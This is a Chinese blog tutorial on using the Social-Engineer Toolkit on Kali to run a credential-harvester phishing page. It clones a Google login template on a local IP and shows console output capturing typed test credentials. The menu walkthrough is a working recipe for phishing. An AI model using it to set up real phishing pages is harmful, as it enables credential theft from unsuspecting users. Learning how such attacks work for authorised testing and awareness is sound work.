【安全系列】setoolkit钓鱼

最新推荐文章于 2024-02-13 22:49:53 发布
最新推荐文章于 2024-02-13 22:49:53 发布
阅读量1.3w 收藏 40
点赞数 12
分类专栏: 安全系列 文章标签: kali setoolkit
大家感觉很有用,请帮忙转发,您的每一次转发就是对我的支持
本文链接:https://blog.csdn.net/qq_30285985/article/details/107590718
版权

setoolkit是一个为社会工程设计的开源渗透测试框架。SET具有许多自定义攻击向量,可让您快速进行可信的攻击。

setoolkit 目录结构

modules
readme
README.md
requirements.txt
seautomate
seproxy
setoolkit
setup.py
seupdate
src

**setoolkit启动 **

通过./setoolkit启动。看到如下图形,启动成功。

在这里插入图片描述

在这里插入图片描述

默认会有如下选项

  1. Social-Engineering Attacks ##社会工程学攻击

  2. Penetration Testing (Fast-Track) ##快速追踪测试

  3. Third Party Modules ##第三方模块

  4. Update the Social-Engineer Toolkit ##升级软件

  5. Update SET configuration ##升级配置

  6. Help, Credits, and About ##帮助

  7. Exit the Social-Engineer Toolkit ##退出

这里制作个钓鱼网站为例子,选择1。

  1. Spear-Phishing Attack Vectors ## 鱼叉式网络钓鱼

  2. Website Attack Vectors ##网页攻击 钓鱼

  3. Infectious Media Generator ## 感染性性攻击,就是木马

  4. Create a Payload and Listener ##建立payloaad和listener

  5. Mass Mailer Attack ## 邮件群发攻击

  6. Arduino-Based Attack Vector ## Arduino基础攻击

  7. Wireless Access Point Attack Vector ##无线接入点攻击

  8. QRCode Generator Attack Vector ##二维码攻击

  9. Powershell Attack Vectors ##Powershell攻击

  10. Third Party Modules ##第三反模块

  11. Return back to the main menu.

选择2 网站攻击进行钓鱼。

  1. Java Applet Attack Method ## java程序攻击

  2. Metasploit Browser Exploit Method ##Metasploit 浏览器漏洞攻击

  3. Credential Harvester Attack Method ##钓鱼网站攻击

  4. Tabnabbing Attack Method

  5. Web Jacking Attack Method ## 网站jacking攻击

  6. Multi-Attack Web Method ## 多种网站攻击方式

  7. HTA Attack Method

  8. Return to Main Menu

选择3 钓鱼网站攻击。既然是网站钓鱼,就一定有网站的样式,这里是选择自己网站的样式,选择一个好的模板才能更好的社工。这里可以根据按照自己的喜欢自行选择。

  1. Web Templates ## web

  2. Site Cloner ## 网站克隆设置

  3. Custom Import ## 自定义导入

  4. Return to Webattack Menu

**这里只是演示,我选择1。**之后输入用户请求提交地址。我本地演示,输入我本地地址,用来获取用户信息。

set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.31.188]:192.168.31.188

设置成功之后,默认带了3个模板供我们选择。这里我选择2 google的登录页面。

  1. Java Required
  2. Google
  3. Twitter

选择2之后,服务启动,如下说明访问当前地址80端口即可。

set:webattack> Select a template:2

[*] Cloning the website: http://www.google.com
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

浏览器输入启动服务机器的ip+80端口;即可看到如下google登录页面。

在这里插入图片描述
在页面中试着输入账号密码,这里账号密码随意输入,对不对都行。之后点即 Sign in进行登录。随后控制台出现如下内容。

192.168.31.123 - - [25/Jul/2020 22:48:32] "GET / HTTP/1.1" 200 -
192.168.31.123 - - [25/Jul/2020 22:48:33] "GET /favicon.ico HTTP/1.1" 404 -
[*] WE GOT A HIT! Printing the output:
PARAM: GALX=SJLCkfgaqoM
PARAM: continue=https://accounts.google.com/o/oauth2/auth?
zt=ChR
PARAM: service=lso
PARAM: dsh=-73818871067
PARAM: _utf8=? 
PARAM: bgresponse=js_disab
PARAM: pstMsg=1
PARAM: dnConn=
PARAM: checkConnection=
PARAM: checkedDomains=youtube
POSSIBLE USERNAME FIELD FOUND: Email=123456
POSSIBLE PASSWORD FIELD FOUND: Passwd=654321
PARAM: signIn=Sign+in
PARAM: PersistentCookie=yes
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

这里很清楚的发现,用户输入的Email为123456,密码是654321。

xia

读到这里了,如果对你有帮助就留个赞吧。

另外关注公众号java内功心法回复我要当架构即可领取java方向必备进阶资料。
在这里插入图片描述

叁滴水
关注
  • 12
    点赞
  • 40
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
安全智能反钓鱼在网络钓鱼犯罪追踪的探索.pdf
08-11
安全智能反钓鱼在网络钓鱼犯罪追踪的探索
爬虫时requests.get()响应状态码不是[200]怎么办?
热门推荐
blog
07-03 2万+
当爬取百度主页时,可以看到get函数只有一个url,也会成功响应,状态码为[200]: >>> import requests >>> url='https://www.baidu.com/' >>> r=requests.get(url) >>> r <Response [200]> >>>...
【Linux】Kali Linux 系统安装详细教程(虚拟机)
康师傅没有眼泪
02-13 3392
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。每一季度更新一次。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。
HTTP协议快速入门
weixin_34357267的博客
01-16 327
一、定义 The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems. HTTP is the foundation of data communication for the World Wide...
Scrapy Crawled (200) <GET http://www.baidu.com/> (referer: None)错误及解决办法
weixin_55109596的博客
03-30 5445
如下图所示,此错误是建立在scrapy框架建立起来的情况下,如图所示,图片左侧是scrapy框架项目结构,出现标题的错误,首先点击如图所示的settings.py文件,找到第40行,如图所示我已经框出来了,这两行刚打开文件时注释的,把这两行注释解开,并且添加"user-agent"字段,这个字段可以在浏览器里面获取,详细就不介绍了,可以自行百度,然后再次运行项目,就可以发现获取到网络的源码了. ...
前端遇到GET https://XXXX net::ERR_HTTP2_PROTOCOL_ERROR 200问题的解决办法
做GIS梦的人
02-14 1万+
问题 今天在使用cesium加载全球DEM数据时,出现一个问题,GET https://…json net::ERR_HTTP2_PROTOCOL_ERROR 200。导致地形数据无法加载出来。因为DEM数据太大了,是放在服务器上。直接通过浏览器访问https://…json这个DEM的文件是可以访问到的,但是通过Cesium加载就是报前面的错误。最终,通过网上资料,发现了下面两种解决办法。 临时解决办法 如果你只能接触到前端代码,无法接触到服务器的话,可以用这种办法, 打开 chrome://flag
社会工程攻击——setoolkit使用(含错误解决)
m0_57069925的博客
06-08 7953
此文章可学习钓鱼网站生成的技巧,切勿用于真实环境,仅用于学习,若产生一切后果,由产生者负责社会工程攻击,是一种利用“社会工程学” (Social Engineering)来实施的网络攻击行为。比如免费下载的软件中捆绑了流氓软件、免费音乐中包含病毒、钓鱼网站、垃圾电子邮件中包括间谍软件等,都是近来社会工程学的代表应用。Kali Linux系统集成了一款社会工程学工具包 Social Engineering Toolkit (SET),它是一个基于Python的开源的社会工程学渗透测试工具。这套工具包由Davi
setoolkit配置使用
Z_l123的博客
01-13 2642
1.在kali中启动setoolkit setoolkit 2.利用SET构建钓鱼网站 1)选择1 Social-Engineering Attacks (社会工程学攻击) 2)选择2Website Attack Vectors (网站攻击流量) 3)选择3Credential Harvester Attack Method (凭证收集攻击方法) 4)选择1Web Templates (网站模板) 5)输入操作机ip,作为钓鱼网站(凭证收集器...
渗透测试 ( 9 ) --- 社会工程攻击工具 setoolkit
墨鱼菜鸡
07-11 1590
github 地址:https://github.com/trustedsec/social-engineer-toolkit kali工具 -- setoolkit(克隆网站及利用):https://blog.csdn.net/weixin_41489908/article/details/103851057 1、社会工程学概念 社会工程学通常以...
set工具集的基础使用
whoim_i的博客
10-22 4068
一、setoolkit介绍 开源的社会工程学利用套件,通常结合 metasploit 来使用。Social-Engineer Toolkit 专 门 用 于 社 会 工 程 的 高 级 攻 击 包 。SET 由 David Kennedy(ReL1K)编写,并在社区人员的大量帮助下,它包含了 以前从未见过的攻击工具集。渗透测试期间,工具包中内置的攻击工具可以进行有针 对性地集中攻击。SET 的主要...
MessagingToolkit.QRCode.dll二维码工具类库
10-18
MessagingToolkit.QRCode dll工具类库,支持中文编码, logo插入,容错率默认为L
网络安全相关.zip
04-19
为了应对这些威胁,需要采取一系列安全措施,包括多因素身份验证、防火墙设置、及时更新操作系统和软件、安全浏览习惯、安装杀毒软件和防火墙、定期备份数据、加密通信、员工培训和教育、定期漏洞扫描和安全评估等...
网络安全面试题.pdf
04-09
1. 什么是网络安全?请说明网络安全的重要性以及在现代社会中的作用。 2. 请介绍一下常见的网络攻击类型,如 DDoS 攻击、SQL 注入、XSS 跨站脚本攻击等。 3. 什么是恶意软件(Malware)?请列举几种常见的恶意软件...
网络安全入门教程.zip
最新发布
04-20
一、引言 网络安全是指保护网络系统中的硬件、软件和数据免受恶意攻击和非法访问...网络安全威胁:包括病毒、木马、黑客攻击、钓鱼网站、网络诈骗等。 网络安全的重要性:关系到个人隐私、企业机密、国家安全等方面。
2023 年网络安全思维导图
01-25
网络安全问题主要涉及到网络攻击、网络病毒、网络钓鱼等内容。网络攻击主要是通过技术手段,破坏网络系统的正常运行。网络病毒是一种恶意软件,能够破坏网络系统的正常运行。网络钓鱼则是通过技术手段,诱骗用户泄露...
超好用的网站克隆工具,就是玩!
叁滴水 的博客
05-26 9363
HTTrack是一个免费的网站克隆工具。它允许您将Internet上的万维网站点下载到本地目录,以递归方式构建所有目录,并从服务器到计算机获取HTML,图像和其他文件。HTTrack安排原始站点的相对链接结构。只需在浏览器中打开“镜像”网站的页面,就可以从一个链接到另一个链接浏览该网站,就像您正在在线查看它一样。HTTrack还可以更新现有的镜像站点,并恢复中断的下载。HTTrack是完全可配置的,并且具有集成的帮助系统。
一个链接泄露这么多隐私,你还敢拼多多助力吗?
叁滴水 的博客
07-06 7525
目前拼多多助力已经是一个非常普遍的事请了,每隔一段时间拼多多会有一些非常优惠的助力活动,但是在商业竞争下的种种问题,导致拼多多助力传播的过程异常艰难,常有通过链接的方式进行助力。但是,肯定每个人都有一个这样的概念,就是"陌生人分享的链接不要点"。这样也就隐含了"熟人的链接,是可以点击的"。这也就正中骗子的下怀。也就是说,正在跟你聊天的人,可能并不是你的熟人。或者他认为的这个助力链接已经被人替换为钓鱼链接。
工具setoolkit的作用和用法
05-31
Setoolkit(Social Engineering Toolkit)是一款开源的社会工程学渗透测试工具,由David Kennedy(ReL1K)开发。它可以帮助安全测试人员模拟各种社会工程学攻击,例如钓鱼攻击、恶意软件传播、密码破解等,以测试目标系统的安全性。 setoolkit的主要作用如下: 1. 自动化社会工程学攻击:setoolkit可以自动生成各种社会工程学攻击的载荷和脚本,例如钓鱼攻击、恶意软件传播、密码破解等。 2. 快速生成攻击页面:setoolkit可以帮助安全测试人员快速生成各种攻击页面,包括伪装的登录页面、恶意软件下载页面等。 3. 攻击向量自定义:setoolkit提供了强大的自定义选项,可以帮助安全测试人员针对不同的目标系统和攻击场景进行定制化的攻击。 4. 数据收集和分析:setoolkit可以帮助安全测试人员收集和分析目标系统中的敏感信息,例如账户名、密码、网站访问记录等。 setoolkit的使用方法如下: 1. 下载和安装:setoolkit是一个Python脚本,可以通过GitHub等渠道进行下载和安装。 2. 运行:在Linux系统中,可以通过终端输入命令“setoolkit”来启动setoolkit。 3. 选择攻击向量:setoolkit会提示用户选择攻击向量,例如钓鱼攻击、恶意软件传播等。 4. 配置攻击选项:setoolkit会提示用户配置攻击选项,例如目标系统的IP地址、端口号、攻击载荷的类型等。 5. 发起攻击:根据用户的配置,setoolkit会自动生成攻击载荷和脚本,并发起攻击。 需要注意的是,setoolkit是一款专业的渗透测试工具,只能在合法授权和授权范围内使用,否则可能触犯法律。同时,在使用setoolkit进行攻击时需要小心谨慎,以避免对目标系统造成不必要的损失和影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

叁滴水

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值